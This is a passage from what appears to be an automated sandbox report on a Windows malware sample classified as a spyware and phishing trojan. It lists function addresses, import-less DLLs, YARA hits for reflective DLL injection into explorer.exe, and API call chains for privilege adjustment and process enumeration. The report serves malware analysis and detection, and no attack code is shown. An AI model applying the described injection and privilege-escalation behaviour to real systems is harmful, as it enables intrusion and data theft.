Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7537069A4	4_2_00007FF7537069A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6DBAC	7_2_00007FF736B6DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6D358	7_2_00007FF736B6D358
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B63744	7_2_00007FF736B63744
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B630F4	7_2_00007FF736B630F4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B5D834	7_2_00007FF736B5D834
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B69830	7_2_00007FF736B69830
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B51DF4	7_2_00007FF736B51DF4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6920C	7_2_00007FF736B6920C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B669A4	7_2_00007FF736B669A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64DC4	7_2_00007FF736B64DC4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B61928	7_2_00007FF736B61928
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B55D34	7_2_00007FF736B55D34
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B5554C	7_2_00007FF736B5554C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B66D54	7_2_00007FF736B66D54
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6B2DC	7_2_00007FF736B6B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B51AA4	7_2_00007FF736B51AA4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6E678	7_2_00007FF736B6E678
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B61690	7_2_00007FF736B61690
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBFBD8	8_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC5C74	8_2_00007FF632DC5C74
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA1000	8_2_00007FF632DA1000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB73F4	8_2_00007FF632DB73F4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC33BC	8_2_00007FF632DC33BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC0B84	8_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB2CC4	8_2_00007FF632DB2CC4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1484	8_2_00007FF632DB1484
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0C64	8_2_00007FF632DB0C64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBD200	8_2_00007FF632DBD200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB91B0	8_2_00007FF632DB91B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC518C	8_2_00007FF632DC518C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA8B20	8_2_00007FF632DA8B20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB7AAC	8_2_00007FF632DB7AAC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1280	8_2_00007FF632DB1280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0A60	8_2_00007FF632DB0A60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC8A38	8_2_00007FF632DC8A38
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA9FCD	8_2_00007FF632DA9FCD
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA979B	8_2_00007FF632DA979B
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB28C0	8_2_00007FF632DB28C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBD880	8_2_00007FF632DBD880
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1074	8_2_00007FF632DB1074
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB5040	8_2_00007FF632DB5040
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA95FB	8_2_00007FF632DA95FB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBCD6C	8_2_00007FF632DBCD6C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC2F20	8_2_00007FF632DC2F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1F30	8_2_00007FF632DB1F30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBFBD8	8_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC5728	8_2_00007FF632DC5728
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC4F10	8_2_00007FF632DC4F10
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0E70	8_2_00007FF632DB0E70
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC5C74	11_2_00007FF632DC5C74
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA1000	11_2_00007FF632DA1000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC4F10	11_2_00007FF632DC4F10
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBFBD8	11_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB73F4	11_2_00007FF632DB73F4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC33BC	11_2_00007FF632DC33BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC0B84	11_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB2CC4	11_2_00007FF632DB2CC4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1484	11_2_00007FF632DB1484
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0C64	11_2_00007FF632DB0C64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBD200	11_2_00007FF632DBD200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB91B0	11_2_00007FF632DB91B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC518C	11_2_00007FF632DC518C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA8B20	11_2_00007FF632DA8B20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB7AAC	11_2_00007FF632DB7AAC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1280	11_2_00007FF632DB1280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0A60	11_2_00007FF632DB0A60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC8A38	11_2_00007FF632DC8A38
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA9FCD	11_2_00007FF632DA9FCD
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA979B	11_2_00007FF632DA979B
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB28C0	11_2_00007FF632DB28C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBD880	11_2_00007FF632DBD880
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1074	11_2_00007FF632DB1074
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB5040	11_2_00007FF632DB5040
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA95FB	11_2_00007FF632DA95FB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBCD6C	11_2_00007FF632DBCD6C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC2F20	11_2_00007FF632DC2F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1F30	11_2_00007FF632DB1F30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBFBD8	11_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC5728	11_2_00007FF632DC5728
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0E70	11_2_00007FF632DB0E70
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F1200	11_2_00007FFE012F1200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE013600BC	11_2_00007FFE013600BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012ED120	11_2_00007FFE012ED120
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DC360	11_2_00007FFE012DC360
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F2384	11_2_00007FFE012F2384
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FC429	11_2_00007FFE012FC429
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D3274	11_2_00007FFE012D3274
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F62D0	11_2_00007FFE012F62D0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D233C	11_2_00007FFE012D233C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D8310	11_2_00007FFE012D8310
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E0300	11_2_00007FFE012E0300
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012EF5A4	11_2_00007FFE012EF5A4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DF520	11_2_00007FFE012DF520
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01312740	11_2_00007FFE01312740
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D26F8	11_2_00007FFE012D26F8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E16D0	11_2_00007FFE012E16D0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D8854	11_2_00007FFE012D8854
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E28B0	11_2_00007FFE012E28B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D5B5C	11_2_00007FFE012D5B5C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DFBE0	11_2_00007FFE012DFBE0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01337BFC	11_2_00007FFE01337BFC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01342A68	11_2_00007FFE01342A68
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012EDAC0	11_2_00007FFE012EDAC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01300E15	11_2_00007FFE01300E15
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01378DF8	11_2_00007FFE01378DF8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01342C48	11_2_00007FFE01342C48
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DFF60	11_2_00007FFE012DFF60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D2FA0	11_2_00007FFE012D2FA0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DD030	11_2_00007FFE012DD030
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FF000	11_2_00007FFE012FF000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01375E64	11_2_00007FFE01375E64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D6AE4	11_2_00007FFE126D6AE4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D2DD0	11_2_00007FFE126D2DD0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE132171CC	11_2_00007FFE132171CC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321D130	11_2_00007FFE1321D130
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E3CF0	11_2_00007FFE148E3CF0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E1A80	11_2_00007FFE148E1A80
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E521C	11_2_00007FFE148E521C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E2D30	11_2_00007FFE148E2D30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E2630	11_2_00007FFE148E2630
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E3140	11_2_00007FFE148E3140
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E1A80	11_2_00007FFE148E1A80
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E37B0	11_2_00007FFE148E37B0
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8920C	13_2_00007FF7F4E8920C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E71DF4	13_2_00007FF7F4E71DF4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84DC4	13_2_00007FF7F4E84DC4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E869A4	13_2_00007FF7F4E869A4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E7554C	13_2_00007FF7F4E7554C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E86D54	13_2_00007FF7F4E86D54
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E81928	13_2_00007FF7F4E81928
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E75D34	13_2_00007FF7F4E75D34
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8B2DC	13_2_00007FF7F4E8B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E71AA4	13_2_00007FF7F4E71AA4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E81690	13_2_00007FF7F4E81690
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8E678	13_2_00007FF7F4E8E678
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8DBAC	13_2_00007FF7F4E8DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8D358	13_2_00007FF7F4E8D358
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E83744	13_2_00007FF7F4E83744
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E830F4	13_2_00007FF7F4E830F4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E89830	13_2_00007FF7F4E89830
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E7D834	13_2_00007FF7F4E7D834

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: String function: 00007FF632DA25F0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: String function: 00007FF632DA2760 appears 36 times

PE file does not import any functions

Source: api-ms-win-core-heap-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: fNzx1wx8tL.exe	Binary or memory string: OriginalFilename vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe, 00000000.00000002.1712554060.00007FF6E1744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe, 00000000.00000003.1709507366.0000015F8012E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe

Yara signature match

Source: 2.0.explorer.exe.7da0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.7da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.9cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.7da0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.fc00000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.9cb0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.7da0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.fc00000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000000.1739477441.0000000007DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@19/61@0/1

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Code function: 8_2_00007FF632DA29E0 GetLastError,FormatMessageW,MessageBoxW,

8_2_00007FF632DA29E0

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1704F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	0_2_00007FF6E1704F24
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17034B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	0_2_00007FF6E17034B0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBC9C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	2_2_09CBC9C4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB4F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	3_2_00007FF699AB4F24
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	3_2_00007FF699AB34B0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	4_2_00007FF7536F34B0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F4F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	4_2_00007FF7536F4F24
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B54F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	7_2_00007FF736B54F24
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B534B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	7_2_00007FF736B534B0
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E74F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	13_2_00007FF7F4E74F24
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E734B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	13_2_00007FF7F4E734B0

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E1705718 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00007FF6E1705718

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

